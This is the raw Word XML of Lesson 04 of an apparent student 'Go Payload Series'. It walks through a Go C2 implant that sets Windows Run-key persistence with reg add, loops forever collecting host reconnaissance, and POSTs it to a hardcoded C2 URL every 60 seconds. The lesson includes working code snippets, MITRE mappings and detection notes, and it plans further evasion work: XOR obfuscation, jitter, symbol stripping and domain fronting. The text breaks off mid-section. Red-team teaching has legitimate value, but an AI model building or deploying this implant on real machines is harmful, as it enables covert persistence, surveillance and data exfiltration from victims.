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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Final Year Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Go Payload Series — Lesson 04 / Version 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net_scan_v3.go — Registry Persistence, Beacon Loop &amp; Full Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="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single" w:color="2E6DA4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EBF3FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK Techniques</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Registry Run Keys — reg add to HKCU\...\Run ensures payload re-executes on every user login.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Protocols — HTTP over port 5000 for C2 beaconing.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1029 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled Transfer — 60-second sleep creates a detectable beacon pattern.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1082 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Information Discovery — All six recon commands run every beacon cycle (inherited from v2).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1041 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exfiltration Over C2 Channel — HTTP POST to Flask C2 with X-Host header (inherited from v1).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1074.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Data Staging — Recon file written to C:\temp\ every cycle before exfil.</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1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 3 is the complete functional payload — the culmination of Versions 1 and 2. Two major capabilities are added: Windows Registry persistence that survives machine reboots, and an infinite 60-second beacon loop that continuously collects and exfiltrates reconnaissance data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With this version the payload behaves as a real C2 implant would in its early operational phase: it installs itself for persistence on first run, then enters a timed loop to periodically check in with the C2 server. Every lesson from this point forward — XOR obfuscation, sleep jitter, binary stripping — modifies this file as its base.</w:t>
      </w:r>
    </w:p>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2. Architecture of the Full Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The complete execution flow of Version 3 from first run to steady-state beaconing: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Startup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os.Executable() gets the binary's own absolute path on disk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 Persistence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reg add writes the binary path to HKCU Run key — runs on every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Loop Entry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Infinite for{} loop begins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 Data Collection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os.MkdirAll, net.Interfaces, all six exec.Command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File Write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os.WriteFile to C:\temp\recon_combined.txt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 Exfiltration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sendToC2() HTTP POST with file contents and X-Host header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 Sleep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time.Sleep(60 seconds)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 Repeat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to stage 4 indefinitely</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3. Code Walkthrough — New Additions Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The recon commands, file write, and sendToC2() function are identical to Version 2. Only the new features — persistence and the beacon loop — are documented here. Refer to the Lesson 02 and Lesson 03 documents for the full explanation of those sections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Getting the Binary's Own Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">os.Executable() returns the absolute path of the currently running binary — for example C:\Users\victim\Downloads\net_scan_v3.exe. This is required to write the correct path into the registry. A hardcoded path would break if the binary is moved or renamed after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i/>
                <w:iCs/>
                <w:color w:val="5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// At the top of main(), before anything else</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">exePath, _ := os.Executable()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a runtime self-discovery technique. The binary asks the OS where it lives rather than assuming. The blank identifier _ discards the error — acceptable for a lab but production code should handle it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Registry Run Key Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This constructs and executes a reg add command that writes the binary's path into the HKCU Run key. Windows automatically executes every value under this key when the current user logs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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">regPath := `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">persistCmd := fmt.Sprintf(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    `reg add "%s" /v ReconBeacon /t REG_SZ /d "%s" /f`,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    regPath, exePath)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">exec.Command("cmd", "/C", persistCmd).Run()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key design decisions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HKCU vs HKLM: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HKEY_CURRENT_USER does not require administrator privileges. The trade-off: persistence only applies for the current user. HKLM would require admin rights but would persist across all users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/f flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forces the operation without prompting for confirmation — required for silent execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Value name 'ReconBeacon': </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is hardcoded and therefore a Host Artefact. Autoruns.exe and any SIEM Run-key rule will match it by name. The obfuscation lessons address encoding this value.</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16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F8EBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon EventID 13 logs all registry value modifications. Any write to a Run key is one of the highest-signal detection rules in enterprise SIEM environments. This is operating at the Host Artifacts tier of the Pyramid of Pain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 The Infinite Beacon Loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">for {} in Go is an infinite loop with no exit condition — it runs until the process is killed. This is the equivalent of while(true) in other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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    os.MkdirAll(`C:\\temp`, 0755)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    timestamp := time.Now().Format("2006-01-02 15:04:05")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    var content string</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i/>
                <w:iCs/>
                <w:color w:val="5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    // ... all recon commands and file write ...</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    sendToC2(c2URL, path, hostname)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    fmt.Printf("Beacon sent at %s. Sleeping 60s...\n", timestamp)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    time.Sleep(60 * time.Second)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every variable declared inside the loop — timestamp, content, cmd, output — is re-initialised on each iteration. The beacon cycle counter in the report header uses time.Now().Unix() (the Unix epoch timestamp) rather than an incrementing integer, so it remains unique even after process restarts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 The 60-Second Sleep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">time.Sleep() pauses the goroutine for the specified duration. 60 * time.Second is idiomatic Go — time.Second is a typed constant of type time.Duration, and multiplication produces a new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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">time.Sleep(60 * time.Second)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">60 seconds is short for a lab environment — you can observe beacons arriving in real time. In a real engagement, implants typically beacon every 4–8 hours. A fixed 60-second interval is a network detection signature: periodic outbound connections to the same IP at the same interval are flagged by Zeek and Suricata beacon detection modules. This is addressed in Lesson 08 (sleep jitter).</w:t>
      </w:r>
    </w:p>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4. Full Version Progression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Feature / Code Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Introduced 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Package imports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02 (v1)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os.MkdirAll C:\temp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02 (v1)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 generation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02 (v1)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Network interfaces (net.Interfaces)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02 (v1)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systeminfo command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02 (v1)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os.WriteFile to disk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02 (v1)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sendToC2() HTTP POST function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02 (v1)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netstat -ano</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03 (v2)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net localgroup administrators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03 (v2)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tasklist /fo csv</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03 (v2)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03 (v2)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arp -a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03 (v2)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wmic logicaldisk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03 (v2)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os.Executable() self-path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04 (v3) — this lesson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Registry Run Key persistence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04 (v3) — this lesson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Infinite for{} beacon loop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04 (v3) — this lesson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time.Sleep(60s) beacon interval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04 (v3) — this lesson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Beacon cycle counter (Unix timestamp)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04 (v3) — this lesson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XOR string obfuscation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07 (v4_xor.go)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Sleep jitter (±20%)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08 (v5_jitter.go)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 symbol stripping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09 (-ldflags compile flag)</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5. Operational Security Weaknesses in v3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 3 is fully functional but operationally noisy. Each weakness below has a corresponding obfuscation lesson that addresses it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Hardcoded C2 IP in Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The string http://192.168.1.10:5000/beacon appears in the compiled binary. strings.exe immediately reveals it. Fix: XOR-encode all strings (Lesson 07). Longer-term: a domain fronting redirector so the true C2 IP never appears in the binary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Hardcoded Registry Value Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
